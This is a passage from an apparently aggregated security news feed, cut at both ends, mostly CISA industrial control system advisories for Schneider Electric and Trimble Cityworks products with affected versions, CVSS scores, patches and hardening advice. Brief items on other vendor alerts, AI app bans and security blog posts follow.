V7.0.18 of EcoStruxure Architecture Builder includes a fix for this vulnerability and is available for download here. EcoStruxure Control Expert Asset Link: Versions prior to V4.0 SP1 - Version V4.0SP1 of EcoStruxure Control Expert Asset Link includes a fix for this vulnerability and is available for download here. Vijeo Designer: Version prior to V6.3SP1 HF1 - Version V6.3SP1 HF1 of Vijeo Designer includes a fix for this vulnerability. Please contact your Schneider Electric Customer Support to get Vijeo Designer version V6.3SP1 HF1 software. Users should follow appropriate patching methodologies when applying these patches to their systems. We strongly recommend the use of back-ups and evaluating the impact of these patches in a Test and Development environment or an offline infrastructure. Contact Schneider Electric's Customer Care Center if you need assistance removing a patch. If users choose not to apply the remediation provided above, they should immediately apply the following mitigations in order to reduce the risk of exploit: Schneider Electric is establishing a remediation plan for all future versions of the following that will include a fix for this vulnerability: EcoStruxure Process Expert EcoStruxure OPC UA Server Expert EcoStruxure Machine SCADA Expert - Asset Link EcoStruxure Operator Terminal Expert EcoStruxure Machine Expert including EcoStruxure Machine Expert Safety EcoStruxure Machine Expert Twin Zelio Soft 2 We will update this document when the remediation is available. Until then, users should immediately apply the following mitigations to reduce the risk of exploit: Limit authenticated user access to the workstation and implement existing User Account Control practices. Follow workstation, network and site-hardening guidelines in the Recommended Cybersecurity Best Practices guide available for download here. To ensure you are informed of all updates, including details on affected products and remediation plans, subscribe to Schneider Electric's security notification service here. General Security Recommendations Schneider Electric strongly recommends the following industry cybersecurity best practices: Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Place all controllers in locked cabinets and never leave them in the "Program" mode. Never connect programming software to any network other than the network intended for that device. Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. 5. UPDATE HISTORY February 6, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-02
CISA Releases Six Industrial Control Systems Advisories
2025-02-06T12:00:00Z | 1738843200

CISA released six Industrial Control Systems (ICS) advisories on February 6, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-037-01 Schneider Electric EcoStruxure Power Monitoring Expert (PME) ICSA-25-037-02 Schneider Electric EcoStruxure ICSA-25-037-03 ABB Drive Composer ICSA-25-037-04 Trimble Cityworks ICSMA-25-037-01 MicroDicom DICOM Viewer ICSMA-25-037-02 Orthanc Server CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

https://www.cisa.gov/news-events/alerts/2025/02/06/cisa-releases-six-industrial-control-systems-advisories
Trimble Cityworks
2025-02-06T12:00:00Z | 1738843200

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.6 ATTENTION: Exploitable remotely/low attack complexity/known public exploitation Vendor: Trimble Equipment: Cityworks Vulnerability: Deserialization of Untrusted Data 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an authenticated user to perform a remote code execution. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Trimble Cityworks, an asset and work management system, are affected: Cityworks: All versions prior to 15.8.9 Cityworks with office companion: All versions prior to 23.10 3.2 VULNERABILITY OVERVIEW 3.2.1 DESERIALIZATION OF UNTRUSTED DATA CWE-502 Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server. CVE-2025-0994 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.2 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0994. A base score of 8.6 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: United States 3.4 RESEARCHER Trimble reported this vulnerability to CISA. 4. MITIGATIONS Cityworks has released the following update guidance for users: Trimble will be releasing updated versions to both 15.x (15.8.9 available January 28, 2025) and Cityworks 23.x software releases (23.10 available January 29, 2025). Information on the updated versions will be available through the normal channels via the Cityworks Support Portal(Login required). On-premise customers should install the updated version immediately. These updates will be automatically applied to all Cityworks Online (CWOL) deployments. Trimble has observed that some on-premise deployments may have overprivileged Internet Information Services (IIS) identity permissions. For avoidance of doubt, and in accordance with Trimble's technical documentation, IIS should not be run with local or domain level administrative privileges on any site. Please refer to the direction in the latest release notes in the Cityworks Support Portal(Login required) for more information on how to update IIS identity permissions. Trimble's CWOL customers have their IIS identity permissions set appropriately and do not need to take this action. Trimble has observed that some deployments have inappropriate attachment directory configurations. Trimble recommends that attachment directory root configuration should be limited to folders/subfolders which only contain attachments. Please refer to the direction in the latest release notes in the Cityworks Support Portal(Login required) for more information on how to ensure proper configuration of the attachment directory. For more information, see Trimble's notification. Cityworks software is incapable of controlling industrial processes, and is not directly part of an ICS. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. CISA has received reports of this vulnerability being actively exploited. 5. UPDATE HISTORY February 06, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-04
Schneider Electric EcoStruxure Power Monitoring Expert (PME)
2025-02-06T12:00:00Z | 1738843200

View CSAF 1. EXECUTIVE SUMMARY CVSS v3 7.1 ATTENTION: Exploitable remotely Vendor: Schneider Electric Equipment: EcoStruxure Power Monitoring Expert (PME) Vulnerability: Deserialization of Untrusted Data 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to remotely execute code. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Schneider Electric reports that the following products are affected: EcoStruxure Power Monitoring Expert (PME): Versions 2022 and prior 3.2 VULNERABILITY OVERVIEW 3.2.1 DESERIALIZATION OF UNTRUSTED DATA CWE-502 A deserialization of untrusted data vulnerability exists which could allow code to be remotely executed on the server when unsafely deserialized data is posted to the web server. CVE-2024-9005 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical Manufacturing, Energy COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: France 3.4 RESEARCHER Schneider Electric CPCERT reported this vulnerability to CISA. 4. MITIGATIONS Schneider Electric has identified the following specific workarounds and mitigations users can apply to reduce risk: EcoStruxure Power Monitoring Expert 2021 and prior have reached end-of-life support. Users should consider upgrading to the latest version offering of PME to resolve this issue. Please contact Schneider Electric Customer Care Center for more details. EcoStruxure Power Monitoring Expert (PME) Version 2022 and prior: There is a hotfix available for EcoStruxure Power Monitoring Expert (PME) that includes a fix for this vulnerability. Contact Schneider Electric's Customer Care Center to download this hotfix. Schneider Electric strongly recommends the following industry cybersecurity best practices: Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Place all controllers in locked cabinets and never leave them in the "Program" mode. Never connect programming software to any network other than the network intended for that device. Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric recommended cybersecurity best practices document and the associated Schneider Electric security notification SEVD-2024-282-05 in PDF and CSAF. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability has a high attack complexity. 5. UPDATE HISTORY February 06, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-01
S-RM awarded Cyber Security Consulting Services Provider of the Year
2025-02-06T11:47:19Z | 1738842439

06 February 2025 – London. Leading global cyber security and corporate intelligence consultancy S-RM was named Cyber Security Consulting Services Provider of the Year at the Cyber Insurance Awards Europe 2025 last night, held in London at the DeVere Grand Connaught Rooms.

https://www.s-rminform.com/news/s-rm-intelligent-insurer-cyber-security-solution
Security Alert (A25-02-06): Multiple Vulnerabilities in Cisco Products
2025-02-06T04:00:00Z | 1738814400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
ClearML Vault API disabled vaults retrieval vulnerability
2025-02-06T00:00:00Z | 1738800000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2112
ClearML dataset upload XSS vulnerability
2025-02-06T00:00:00Z | 1738800000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2110
Blocking AI Apps
2025-02-05T20:20:11Z | 1738786811

There has been much discussion about AI recently, and various governments are banning certain services. Recently there have been a series of Deepseek bans in various countries. The method is to either ban users from using the service, such as Australian federal employees, or remove the app from the relevant store, as Italy has done. Example: https://www.business-standard.com/technology/tech-news/us-congress-bans-deepseek-ai-security-risks-125020101088_1.html […]

https://secure64.com/2025/02/05/blocking-ai-apps/
From Testing to Triumph: Why CIOs and CISOs Should Champion the PoC Journey
2025-02-05T15:28:58Z | 1738769338

The post From Testing to Triumph: Why CIOs and CISOs Should Champion the PoC Journey  appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-why-cios-and-cisos-should-champion-the-poc-journey
E-valimised on turvalised ja läbipaistvad
2025-02-05T14:41:41Z | 1738766501

Riigi Infosüsteemi Amet (RIA) kinnitab, et Eesti e-valimiste süsteem on turvaline, läbipaistev ja pidevalt arendatav.

https://ria.ee/uudised/e-valimised-turvalised-ja-labipaistvad
Red Flag Bulletin | February 2025 | INTERPOL launches Silver Notice
2025-02-05T14:17:39Z | 1738765059

This month’s top stories: INTERPOL establishes pilot phase of Silver Notice to aid in the tracing and recovery of criminal assets; Trial of former French President Nicolas Sarkozy over alleged illegal campaign financing links to Muammar Gaddafi begins; and Serbian oil company NIS sanctioned by US due to majority ownership by Russian state.

https://www.s-rminform.com/red-flag-bulletin/february-2025
Virtual private networks (ITSAP.80.101)
2025-02-05T14:14:39Z | 1738764879

https://cyber.gc.ca/en/guidance/virtual-private-networks-itsap80101
Preventing account takeover on centralized cryptocurrency exchanges in 2025
2025-02-05T14:00:37Z | 1738764037

This blog post highlights key points from our new white paper Preventing Account Takeovers on Centralized Cryptocurrency Exchanges, which documents ATO-related attack vectors and defenses tailored to CEXes. Imagine trying to log in to your centralized cryptocurrency exchange (CEX) account and your password and username just… don’t work. You […]

https://blog.trailofbits.com/2025/02/05/preventing-account-takeover-on-centralized-cryptocurrency-exchanges-in-2025/
The Numbers Behind the Game: Cisco and the NFL
2025-02-05T14:00:00Z | 1738764000

As Super Bowl LIX approaches, the spotlight is on the players, but behind the scenes, Cisco is ensuring every moment is seamlessly connected and secure. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/nfl-by-the-numbers.html
The Numbers Behind the Game: Cisco and the NFL
2025-02-05T14:00:00Z | 1738764000

As Super Bowl LIX approaches, the spotlight is on the players, but behind the scenes, Cisco is ensuring every moment is seamlessly connected and secure. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/nfl-by-the-numbers.html
CISA Adds One Known Exploited Vulnerability to Catalog
2025-02-05T12:00:00Z | 1738756800

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-53104 Linux Kernel Out-of-Bounds Write Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

https://www.cisa.gov/news-events/alerts/2025/02/05/cisa-adds-one-known-exploited-vulnerability-catalog
Patch or perish: How organizations can master vulnerability management
2025-02-05T10:00:00Z | 1738749600

Don’t wait for a costly breach to provide a painful reminder of the importance of timely software patching

https://www.welivesecurity.com/en/cybersecurity/patch-perish-organizations-vulnerability-management/
ZTNA is no longer enough. So, what’s next?
2025-02-05T09:05:36Z | 1738746336

Remote work. Cloud applications. Mobile devices. They’ve eliminated the days of traditional security perimeters. Today, security must happen at the device level—no matter where that device is.   Zero Trust Network Access (ZTNA) earned its place as the G.O.A.T. for remote access—and rightly so. It revolutionized how enterprises secure remote work, but it has its limitations... The post ZTNA is no longer enough. So, what’s next?  appeared first on Cato Networks.

https://www.catonetworks.com/blog/ztna-is-no-longer-enough-so-whats-next/
Hacking on the Go: Wi-Fi Karma Attacks with Mobile Devices
2025-02-05T07:25:41Z | 1738740341

Being automatically reconnected to known Wi-Fi networks is a convenience that comes with security risks, one of them being the Wi-Fi Karma Attack. Cybercriminals can use this method to trick unsuspecting users into automatically connecting to rogue Wi-Fi networks, potentially exposing privacy information by revealing access points where they were connected in the past, lure […] The post Hacking on the Go: Wi-Fi Karma Attacks with Mobile Devices first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/02/05/hacking-on-the-go-wi-fi-karma-attacks-with-mobile-devices/
Security Alert (A25-02-04): Multiple Vulnerabilities in Firefox
2025-02-05T04:00:00Z | 1738728000

Mozilla has published the advisories (MFSA2025-07, MFSA2025-08 and MFSA2025-09) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-02-05): Multiple Vulnerabilities in Google Chrome
2025-02-05T04:00:00Z | 1738728000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
The convergence of space and cyber: An evolving threat landscape
2025-02-05T00:00:00Z | 1738713600

Explore the critical role of cyberattacks in shaping the modern space race. Learn how nation-states and organizations must adapt their cybersecurity measures to protect global economies, military operations, and the future of space exploration.

https://www.recordedfuture.com/blog/convergence-space-cyber
Call: Projeto Europeu CYSSDE
2025-02-05T00:00:00Z | 1738713600

Está a decorrer até 7 de abril, uma call do Projeto Europeu CYSSDE - CyberSecurity Deployment Preparedness Support, Capacity and Capabilities, que visa financiar e disponibilizar apoio para testes de penetração de cibersegurança, análise de vulnerabilidades, evolução de soluções de SOC (Security Operations Center), entre outras, em entidades e setores-chave abrangidos pela NIS2. Apoiar as organizações no fortalecimento da sua ciber-resiliência e maturidade através da implementação atividades de gestão de vulnerabilidades, monitorização e testes de intrusão com vista a melhorar as suas capacidades é o objetivo do projeto Europeu CYSSDE – “CyberSecurity Deployment Preparedness Support, Capacity and Capabilities”, financiado pelo Programa Europa Digital. Entidades elegíveis: empresas, consórcios (máximo 2 entidades), Digital Innovation Hubs (DIHS), instituições de investigação e organizações relevantes nos estados-membros da União Europeia. Financiamento: até 200 000€ Data-limite: 7 de abril de 2025 às 17h (hora de Bruxelas) Mais informações na área do NCC-PT

https://dyn.cncs.gov.pt/pt/detalhe/art/135911/call-projeto-europeu-cyssde
Ransomware and the Impact on Human Lives
2025-02-04T18:11:01Z | 1738692661

In past years, we've all talked about the looming threat of ransomware and cyberattacks, not just as organizational and digital risks but as potential dangers to human lives. Unfortunately, this concern has now materialized starkly. The recent ransomware attack on the

https://www.hyas.com/blog/ransomware-and-the-impact-on-human-lives
Joint guidance on building trust in artificial intelligence through a cyber risk-based approach
2025-02-04T17:57:07Z | 1738691827

https://cyber.gc.ca/en/news-events/joint-guidance-building-trust-artificial-intelligence-through-cyber-risk-based-approach
CVE-2025-0960
2025-02-04T16:35:00Z | 1738686900

CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'): AutomationDirect C-more EA9 HMI contains a function with bounds checks that can be skipped, which could result in an attacker abusing the function to cause a denial-of-service condition or achieving remote code execution on the affected device. AutomationDirect recommends that users update C-MORE EA9 HMI software and firmware to V6.80

https://claroty.com/team82/disclosure-dashboard/cve-2025-0960
Smooth Out Your Patch Management: How to Reduce Vulnerability Severity
2025-02-04T16:06:41Z | 1738685201

When maintaining embedded systems, patching is one of the most resource-intensive challenges for software developers and security teams. Between developing patches, testing, deploying them, and working to maintain system uptime, patching is a big drain on resources. It also eats up time. It can take months on average for patches to be released by vendors […] The post Smooth Out Your Patch Management: How to Reduce Vulnerability Severity appeared first on RunSafe Security.

https://runsafesecurity.com/blog/vulnerability-patch-management-solutions/
Top 10 web hacking techniques of 2024
2025-02-04T15:01:48Z | 1738681308

Welcome to the Top 10 Web Hacking Techniques of 2024, the 18th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

https://portswigger.net/research/top-10-web-hacking-techniques-of-2024
Five Eyes publish series to sound alarm on cyber security threats to edge devices
2025-02-04T15:00:42Z | 1738681242

https://cyber.gc.ca/en/news-events/five-eyes-publish-series-sound-alarm-cyber-security-threats-edge-devices
Security considerations for edge devices (ITSM.80.101)
2025-02-04T15:00:00Z | 1738681200

https://cyber.gc.ca/en/guidance/security-considerations-edge-devices-itsm80101
Gartner®: 2024 Hype Cycle™ for Cyber Risk Management
2025-02-04T14:00:00Z | 1738677600

Cyber-risk management, now a top concern for executives and regulators, utilizes multiple methods and techniques to support governance, risk management and compliance.

https://blog.riskrecon.com/resources/reports-and-whitepapers/gartner-2024-hype-cycle-for-cyber-risk-management
Roeland Nusselder: AI will eat all our energy, unless we make it tiny | Starmus highlights
2025-02-04T13:39:31Z | 1738676371

Left unchecked, AI's energy and carbon footprint could become a significant concern. Can our AI systems be far less energy-hungry without sacrificing performance?

https://www.welivesecurity.com/en/we-live-science/roeland-nusselder-ai-will-eat-all-our-energy-unless-we-make-it-tiny-starmus-highlights/
Schneider Electric Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.7 ATTENTION: Exploitable remotely/low attack complexity Vendor: Schneider Electric Equipment: Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC Vulnerability: Incorrect Calculation of Buffer Size 2. RISK EVALUATION Successful exploitation of this vulnerability could cause a denial-of-service of the product when an unauthenticated user sends a crafted HTTPS packet to the webserver. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC are affected: Modicon M580 CPU (part numbers BMEP* and BMEH*, excluding M580 CPU Safety): Versions prior to SV4.30 Modicon M580 CPU Safety (part numbers BMEP58-S and BMEH58-S): Versions prior to SV4.21 BMENOR2200H: All versions EVLink Pro AC: Versions prior to v1.3.10 3.2 VULNERABILITY OVERVIEW 3.2.1 INCORRECT CALCULATION OF BUFFER SIZE CWE-131 The affected product is vulnerable to an incorrect calculation of buffer size vulnerability which could cause a denial-of-service of the product when an unauthenticated user is sending a crafted HTTPS packet to the webserver. CVE-2024-11425 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). A CVSS v4 score has also been calculated for CVE-2024-11425. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical Manufacturing, Energy COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: France 3.4 RESEARCHER Schneider Electric reported this vulnerability to CISA. 4. MITIGATIONS Schneider Electric has identified the following remediations users can apply to reduce risk: Modicon M580 CPU (partnumbers BMEP* and BMEH*,excluding M580 CPU Safety): Version SV4.30 of Modicon M580 firmware includes a fix for this vulnerability and is available for download. Modicon M580 CPU Safety part numbers BMEP58-S and MEH58-S): Version SV4.21 of Modicon M580 firmware includes a fix for this vulnerability and is available for download. EVLink Pro AC: Version V1.3.10 of EVLink Pro AC firmware includes a fix for this vulnerability and is available here. Users should use appropriate patching methodologies when applying these patches to their systems. Schneider Electric strongly recommends making use of back-ups and evaluating the impact of these patches in a testing and development environment or on an offline infrastructure. Contact Schneider Electric's Customer Care Center if assistance is needed for removing a patch. If users choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit: Modicon M580 CPU (partnumbers BMEP* and BMEH*,excluding M580 CPU Safety): Set up network segmentation and implement a firewall to block all unauthorized access to Port 443/TCP. Configure the access control list following the recommendations of the user manuals: "Modicon M580, Hardware, Reference Manual" Modicon M580 CPU Safety part numbers BMEP58-S and MEH58-S): Set up network segmentation and implement a firewall to block all unauthorized access to Port 443/TCP. Configure the access control list following the recommendations of the user manuals: "Modicon M580, Hardware, Reference Manual" BMENOR2200H: Schneider Electric is establishing a remediation plan for BMENOR2200H that will include a fix for CVE-2024-11425. They will update SEVD-2025-014-01 when the remediation is available. Until then, users should immediately set up network segmentation and implement a firewall to block all unauthorized access to Port 443/TCP. EVLink Pro AC: Follow the EVlink Pro AC cybersecurity guide Schneider Electric strongly recommends the following industry cybersecurity best practices. Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Place all controllers in locked cabinets and never leave them in the "Program" mode. Never connect programming software to any network other than the network intended for that device. Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document. For more information, see Schneider Electric security notification "SEVD-2025-014-01 Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC" CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 4, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-04
Schneider Electric Modicon M340 and BMXNOE0100/0110, BMXNOR0200H
2025-02-04T12:00:00Z | 1738670400

View CSAF 1. EXECUTIVE SUMMARY CVSS v3 8.6 ATTENTION: Exploitable remotely/low attack complexity Vendor: Schneider Electric Equipment: Modicon M340 and BMXNOE0100/0110, BMXNOR0200H Vulnerability: Exposure of Sensitive Information to an Unauthorized Actor 2. RISK EVALUATION Successful exploitation of this vulnerability could cause information disclosure of a restricted web page, modification of a web page, and a denial of service when specific web pages are modified and restricted functions invoked. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Schneider Electric products, Modicon M340 and BMXNOE0100/0110, BMXNOR0200H, are affected: Modicon M340 processors (part numbers BMXP34*): All versions BMXNOE0100: All versions BMXNOE0110: All versions BMXNOR0200H: Versions prior to SV1.70IR26 3.2 VULNERABILITY OVERVIEW 3.2.1 EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR CWE-200 The affected products are vulnerable to an exposure of sensitive information to an unauthorized actor vulnerability, which could cause information disclosure of restricted web page, modification of web page, and denial of service when specific web pages are modified and restricted functions invoked. CVE-2024-12142 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.6 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical Manufacturing, Energy COUNTRIES/AREAS DEPLOYED: France COMPANY HEADQUARTERS LOCATION: Worldwide 3.4 RESEARCHER Schneider Electric reported this vulnerability to CISA. 4. MITIGATIONS Schneider Electric has identified the following specific workarounds and mitigations users can apply to reduce risk: BMXNOR0200H: Version SV1.70IR26 of BMXNOR0200H includes a fix for this vulnerability and is available for download. Users should use appropriate patching methodologies when applying these patches to their systems. Schneider Electric strongly recommends the use of back-ups and evaluating the impact of these patches in a testing and development environment, or on an offline infrastructure. Contact Schneider Electric's Customer Care Center for assistance removing a patch. Schneider Electric is establishing a remediation plan for all future versions of Modicon M340 processors BMXP34*, BMXNOE0100 and BMXNOE0110 that will include a fix for this vulnerability. They will provide an update when the remediation is available. Until then, users should immediately apply the following mitigations to reduce the risk of exploit: Set up network segmentation and implement a firewall to block all unauthorized access to FTP Port 21/TCP on the devices. Disable FTP service via EcoStruxureTM Control Expert. This is disabled by default when a new application is created. Disable Web server service via EcoStruxureTM Control Expert. This is disabled by default when a new application is created. Configure the Access Control List following the recommendation on the "Modicon Controllers System Cybersecurity" Schneider Electric strongly recommends the following industry cybersecurity best practices. Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Place all controllers in locked cabinets and never leave them in the "Program" mode. Never connect programming software to any network other than the network intended for that device. Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document. For more information, see Schneider Electric security notification "SEVD-2025-014-05 Web Server on 